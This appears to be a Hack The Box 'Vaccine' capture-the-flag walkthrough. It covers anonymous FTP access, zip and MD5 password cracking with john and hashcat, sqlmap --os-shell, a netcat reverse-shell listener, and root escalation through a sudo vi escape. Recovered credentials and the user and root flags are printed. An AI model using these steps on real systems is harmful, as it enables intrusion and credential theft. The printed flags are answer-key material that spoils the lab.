Deep Dive: Solving HTB Tier 2 – Challenge 3 ‘Vaccine’
Join us in this technical exploration of the ‘Vaccine’ challenge, part of the “HTB – Hack the Box Series”. This tutorial is one of many in our series designed to advance your cybersecurity skills. Explore more challenges at: HTB – Hack the Box Series.
System Update and VPN Connectivity
Ensure your Kali Linux is updated for the latest functionalities and security patches:
$ sudo apt update $ sudo apt full-upgrade -y
Establish a secure VPN connection to access the HTB environment:
$ sudo openvpn Downloads/starting_point_UserName.ovpn
Initial Reconnaissance with Nmap
Use Nmap to perform a comprehensive scan on the target system, identifying open ports and running services:
nmap -sC -sV -p- 10.129.239.94
┌──(toor㉿kali)-[~] └─$ nmap -sC -sV 10.129.239.94 Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-09 11:18 EST Nmap scan report for 10.129.239.94 Host is up (0.044s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.10.15.210 | Logged in as ftpuser | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rwxr-xr-x 1 0 0 2533 Apr 13 2021 backup.zip 22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 c0ee58077534b00b9165b259569527a4 (RSA) | 256 ac6e81188922d7a7417d814f1bb8b251 (ECDSA) |_ 256 425bc321dfefa20bc95e03421d69d028 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: MegaCorp Login Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.26 seconds
- Besides SSH and HTTP, what other service is hosted on this box? – ftp
- This service can be configured to allow login with any password for specific username. What is that username? – Anonymous
- What is the name of the file downloaded over this service? – backup.zip
- add the domain nameto the local hosts file
┌──(toor㉿kali)-[~] └─$ sudo nano /etc/hosts [sudo] password for toor: ┌──(toor㉿kali)-[~] └─$ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali # HTB 10.129.131.112 unika.htb 10.129.239.94 vaccine.htb # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters ┌──(toor㉿kali)-[~] └─$
- ftp to the domain name, authenticate with Anonymous and with any password, get the file backup.zip
┌──(toor㉿kali)-[~] └─$ ftp vaccine.htb Connected to vaccine.htb. 220 (vsFTPd 3.0.3) Name (vaccine.htb:toor): Anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> get backup.zip local: backup.zip remote: backup.zip 229 Entering Extended Passive Mode (|||10886|) 150 Opening BINARY mode data connection for backup.zip (2533 bytes). 100% |*********************************************************************************************************************************| 2533 774.21 KiB/s 00:00 ETA 226 Transfer complete. 2533 bytes received in 00:00 (60.43 KiB/s) ftp> quit 221 Goodbye. ┌──(toor㉿kali)-[~] └─$
- What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts? zip2john
┌──(toor㉿kali)-[~] └─$ locate zip2john /usr/sbin/zip2john ┌──(toor㉿kali)-[~] └─$
┌──(toor㉿kali)-[~] └─$ zip2john backup.zip > hash ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8 ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8 NOTE: It is assumed that all files in each archive have the same password. If that is not the case, the hash may be uncrackable. To avoid this, use option -o to pick a file at a time. ┌──(toor㉿kali)-[~] └─$ cat hash backup.zip:$pkzip$2*1*1*0*8*24*5722*543fb39ed1a919ce7b58641a238e00f4cb3a826cfb1b8f4b225aa15c4ffda8fe72f60a82*2*0*3da*cca*1b1ccd6a*504*43*8*3da*989a*22290dc3505e51d341f31925a7ffefc181ef9f66d8d25e53c82afc7c1598fbc3fff28a17ba9d8cec9a52d66a11ac103f257e14885793fe01e26238915796640e8936073177d3e6e28915f5abf20fb2fb2354cf3b7744be3e7a0a9a798bd40b63dc00c2ceaef81beb5d3c2b94e588c58725a07fe4ef86c990872b652b3dae89b2fff1f127142c95a5c3452b997e3312db40aee19b120b85b90f8a8828a13dd114f3401142d4bb6b4e369e308cc81c26912c3d673dc23a15920764f108ed151ebc3648932f1e8befd9554b9c904f6e6f19cbded8e1cac4e48a5be2b250ddfe42f7261444fbed8f86d207578c61c45fb2f48d7984ef7dcf88ed3885aaa12b943be3682b7df461842e3566700298efad66607052bd59c0e861a7672356729e81dc326ef431c4f3a3cdaf784c15fa7eea73adf02d9272e5c35a5d934b859133082a9f0e74d31243e81b72b45ef3074c0b2a676f409ad5aad7efb32971e68adbbb4d34ed681ad638947f35f43bb33217f71cbb0ec9f876ea75c299800bd36ec81017a4938c86fc7dbe2d412ccf032a3dc98f53e22e066defeb32f00a6f91ce9119da438a327d0e6b990eec23ea820fa24d3ed2dc2a7a56e4b21f8599cc75d00a42f02c653f9168249747832500bfd5828eae19a68b84da170d2a55abeb8430d0d77e6469b89da8e0d49bb24dbfc88f27258be9cf0f7fd531a0e980b6defe1f725e55538128fe52d296b3119b7e4149da3716abac1acd841afcbf79474911196d8596f79862dea26f555c772bbd1d0601814cb0e5939ce6e4452182d23167a287c5a18464581baab1d5f7d5d58d8087b7d0ca8647481e2d4cb6bc2e63aa9bc8c5d4dfc51f9cd2a1ee12a6a44a6e64ac208365180c1fa02bf4f627d5ca5c817cc101ce689afe130e1e6682123635a6e524e2833335f3a44704de5300b8d196df50660bb4dbb7b5cb082ce78d79b4b38e8e738e26798d10502281bfed1a9bb6426bfc47ef62841079d41dbe4fd356f53afc211b04af58fe3978f0cf4b96a7a6fc7ded6e2fba800227b186ee598dbf0c14cbfa557056ca836d69e28262a060a201d005b3f2ce736caed814591e4ccde4e2ab6bdbd647b08e543b4b2a5b23bc17488464b2d0359602a45cc26e30cf166720c43d6b5a1fddcfd380a9c7240ea888638e12a4533cfee2c7040a2f293a888d6dcc0d77bf0a2270f765e5ad8bfcbb7e68762359e335dfd2a9563f1d1d9327eb39e68690a8740fc9748483ba64f1d923edfc2754fc020bbfae77d06e8c94fba2a02612c0787b60f0ee78d21a6305fb97ad04bb562db282c223667af8ad907466b88e7052072d6968acb7258fb8846da057b1448a2a9699ac0e5592e369fd6e87d677a1fe91c0d0155fd237bfd2dc49*$/pkzip$::backup.zip:style.css, index.php:backup.zip ┌──(toor㉿kali)-[~] └─$
┌──(toor㉿kali)-[~] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 6 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 741852963 (backup.zip) 1g 0:00:00:00 DONE (2022-11-09 12:27) 50.00g/s 614400p/s 614400c/s 614400C/s 123456..hawkeye Use the "--show" option to display all of the cracked passwords reliably Session completed. ┌──(toor㉿kali)-[~] └─$
┌──(toor㉿kali)-[~] └─$ unzip backup.zip Archive: backup.zip [backup.zip] index.php password: inflating: index.php inflating: style.css ┌──(toor㉿kali)-[~] └─$ cat index.php <!DOCTYPE html> <?php session_start(); if(isset($_POST['username']) && isset($_POST['password'])) { if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") { $_SESSION['login'] = "true"; header("Location: dashboard.php");
┌──(toor㉿kali)-[~] └─$ hashcat -m 0 2cb42f8734ea607eefed3b70af13bbd3 /usr/share/wordlists/rockyou.txt hashcat (v6.2.6) starting OpenCL API (OpenCL 3.0 PoCL 3.0+debian Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ============================================================================================================================================ * Device #1: pthread-AMD Ryzen 5 5600H with Radeon Graphics, 2921/5906 MB (1024 MB allocatable), 6MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Early-Skip * Not-Salted * Not-Iterated * Single-Hash * Single-Salt * Raw-Hash ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 1 MB Dictionary cache built: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344392 * Bytes.....: 139921507 * Keyspace..: 14344385 * Runtime...: 1 sec 2cb42f8734ea607eefed3b70af13bbd3:qwerty789 Session..........: hashcat Status...........: Cracked Hash.Mode........: 0 (MD5) Hash.Target......: 2cb42f8734ea607eefed3b70af13bbd3 Time.Started.....: Thu Nov 10 13:16:13 2022 (0 secs) Time.Estimated...: Thu Nov 10 13:16:13 2022 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 1598.9 kH/s (0.11ms) @ Accel:512 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 101376/14344385 (0.71%) Rejected.........: 0/101376 (0.00%) Restore.Point....: 98304/14344385 (0.69%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: Dominic1 -> ilovehim123 Hardware.Mon.#1..: Util: 14% Started: Thu Nov 10 13:15:49 2022 Stopped: Thu Nov 10 13:16:14 2022 ┌──(toor㉿kali)-[~] └─$
- What is the password for the admin user on the website? – qwerty789
- https://crackstation.net/
- What option can be passed to sqlmap to try to get command execution via the sql injection? (–os-shell)
- sqlmap -h
- https://www.revshells.com/
- nc mkfifo
python3 -c 'import pty;pty.spawn("/bin/bash");'
┌──(toor㉿kali)-[~] └─$ nc -nlvp 4444 listening on [any] 4444 ... connect to [10.10.14.104] from (UNKNOWN) [10.129.138.183] 42756 sh: 0: can't access tty; job control turned off $ whoami postgres $ find / -perm -4000 -type f 2>/dev/ sh: 2: cannot create /dev/: Is a directory $ pwd /var/lib/postgresql/11/main $ cd /var/www/html $ ls bg.png dashboard.css dashboard.js dashboard.php index.php license.txt style.css $ grep -i -R "pass" * dashboard.php: $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!"); index.php: if(isset($_POST['username']) && isset($_POST['password'])) { index.php: if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") { index.php: <label for="login__password"><svg class="icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#lock"></use></svg><span class="hidden">Password</span></label> index.php: <input id="login__password" type="password" name="password" class="form__input" placeholder="Password" required> style.css:.form input[type='password'], style.css:.login input[type='password'], style.css:.login input[type='password'], style.css:.login input[type='password']:focus, style.css:.login input[type='password']:hover, $
toor㉿kali)-[~] └─$ ssh [email protected] The authenticity of host 'vaccine.htb (10.129.138.183)' can't be established. ED25519 key fingerprint is SHA256:4qLpMBLGtEbuHObR8YU15AGlIlpd0dsdiGh/pkeZYFo. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'vaccine.htb' (ED25519) to the list of known hosts. [email protected]'s password: Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Fri 11 Nov 2022 02:39:29 PM UTC System load: 0.15 Processes: 187 Usage of /: 32.6% of 8.73GB Users logged in: 0 Memory usage: 19% IP address for ens160: 10.129.138.183 Swap usage: 0% 0 updates can be installed immediately. 0 of these updates are security updates. The list of available updates is more than a week old. To check for new updates run: sudo apt update The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. postgres@vaccine:~$ sudo -l [sudo] password for postgres: Matching Defaults entries for postgres on vaccine: env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass User postgres may run the following commands on vaccine: (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf postgres@vaccine:~$
- https://gtfobins.github.io/gtfobins/vi/
postgres@vaccine:~$ ls 11 user.txt postgres@vaccine:~$ cat user.txt ec9b13ca4d6229cd5cc1e09980965bf7 postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf # whoami root # cd /root # ls pg_hba.conf root.txt snap # cat root.txt dd6e058e814260bc70e9bbdef2715849 #
- What program can the postgres user run as root using sudo? vi
- user flag – ec9b13ca4d6229cd5cc1e09980965bf7
- root flag – dd6e058e814260bc70e9bbdef2715849
- https://www.hackthebox.com/achievement/machine/303878/289
Ethical Hacking Reminder
This guide provides a technical walkthrough for solving the ‘Vaccine’ challenge on HTB. We promote ethical hacking practices and encourage using these skills for enhancing cybersecurity knowledge and defense capabilities.